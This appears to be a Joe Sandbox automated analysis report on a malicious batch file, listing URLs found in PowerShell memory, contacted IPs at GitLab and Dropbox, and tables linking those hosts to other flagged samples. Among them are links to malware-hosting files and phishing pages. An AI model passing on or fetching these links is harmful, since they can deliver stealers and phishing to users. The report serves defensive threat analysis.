                                                                                                https://github.com/python/cpython/blob/main/Doc/library/asyncio-stream.rstpowershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.gzip.org/#faq8gzip.py.19.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://tools.ietf.org/html/rfc3986#section-3.3client.py.19.drfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://idlefork.sourceforge.netChangeLog.19.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmpowershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://app.hellofax.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/soap/envelopetest_xml_etree.py.19.drfalse
                                                                                                                    high
                                                                                                                    https://tools.ietf.org/html/rfc7231#section-4.3.6)client.py.19.drfalse
                                                                                                                      high
                                                                                                                      https://www.hellofax.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                      unknown
                                                                                                                      https://docs.python.org/using/windows.html#python-launcher-for-windowspowershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.pythonware.compowershell.exe, 00000013.00000002.3330232690.000001E0D86C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D88CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://a.sprig.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://apis.google.compowershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdtest_xml_etree.py.19.drfalse
                                                                                                                                      high
                                                                                                                                      https://bugs.python.org/issue46571ann_module8.py.19.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.rfc-editor.org/rfc/rfc3986#page-49powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://docsend.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://xmlrpc-epi.sourceforge.net/specs/rfc.fault_codes.php)powershell.exe, 00000013.00000002.3330232690.000001E0D88CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://tools.ietf.org/html/rfc8017#page-36pkcs1_15.py.19.drfalse
                                                                                                                                              high
                                                                                                                                              https://tools.ietf.org/html/rfc8017#page-37pkcs1_15.py.19.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_advertising_campaign_and_collaboration.docx?powershell.exe, 0000000C.00000002.2230026256.000001F11CF56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.ietf.orginC14N3.xml.19.dr, out_inC14N3_c14nDefault.xml.19.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/python/cpython/tree/3.12/Lib/symtable.pypowershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.python.org/powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://dl.acm.org/citation.cfm?id=704143)PKCS1_OAEP.py.19.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://xml.python.org/entities/fragment-builder/internalpowershell.exe, 00000013.00000002.3330232690.000001E0D85A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://url.spec.whatwg.org/powershell.exe, 00000013.00000002.3330232690.000001E0D9F08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://www.iana.org/assignments/character-setspowershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://xml.org/sax/properties/declaration-handlerpowershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://javascript.crockford.com/tdop/tdop.htmlpowershell.exe, 00000013.00000002.3330232690.000001E0D86E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://tools.ietf.org/html/rfc5297_mode_siv.py.19.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://bugs.python.org/issue2578.powershell.exe, 00000013.00000002.3330232690.000001E0D9D52000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://lynx.browser.org/powershell.exe, 00000013.00000002.3330232690.000001E0D845D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8468000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2230091662.000001F1200AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.dropbox.compowershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://app.hellosign.com/powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://xml.org/sax/features/namespace-prefixespowershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              172.65.251.78
                                                                                                                                                                              gitlab.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              162.125.66.18
                                                                                                                                                                              www-env.dropbox-dns.comUnited States
                                                                                                                                                                              19679DROPBOXUSfalse
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1557411
                                                                                                                                                                              Start date and time:2024-11-18 08:34:10 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 7m 45s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:20
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:bose1511mkt.bat
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal92.evad.winBAT@28/1038@4/2
                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              • Number of executed functions: 33
                                                                                                                                                                              • Number of non-executed functions: 2
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .bat
                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 3840 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 5176 because it is empty
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6452 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: bose1511mkt.bat
                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              02:35:09API Interceptor128x Sleep call for process: powershell.exe modified
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                              162.125.66.18https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUSGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          with you.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            Re_ Matthew Magro shared _Bonitz .pdf_ with you.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              https://t.ly/N1B0DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                Bernard Vermeiren shared 'Tech Marine Srl 15102024' with you (568Ko).msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  gitlab.comm2.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.25861.18393.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.25861.18393.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  2plugin27724.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  Doc1.docmGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  check.batGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  edge-block-www-env.dropbox-dns.comprotected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  https://comedy.netflix.kidsuper.tv/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  CLOUDFLARENETUShttps://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                                  INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.21.2.83
                                                                                                                                                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                  XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.21.74.130
                                                                                                                                                                                                  5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.67.203.31
                                                                                                                                                                                                  https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.zaGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                                  XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.21.74.130
                                                                                                                                                                                                  5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 104.21.74.130
                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                  rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                  DROPBOXUShttps://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.1.20
                                                                                                                                                                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                  meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 162.125.189.88
                                                                                                                                                                                                  https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                                  • 162.125.67.15
                                                                                                                                                                                                  FW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.70.18
                                                                                                                                                                                                  Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.1.20
                                                                                                                                                                                                  https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.21.1
                                                                                                                                                                                                  https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.40.3
                                                                                                                                                                                                  https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eFactura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
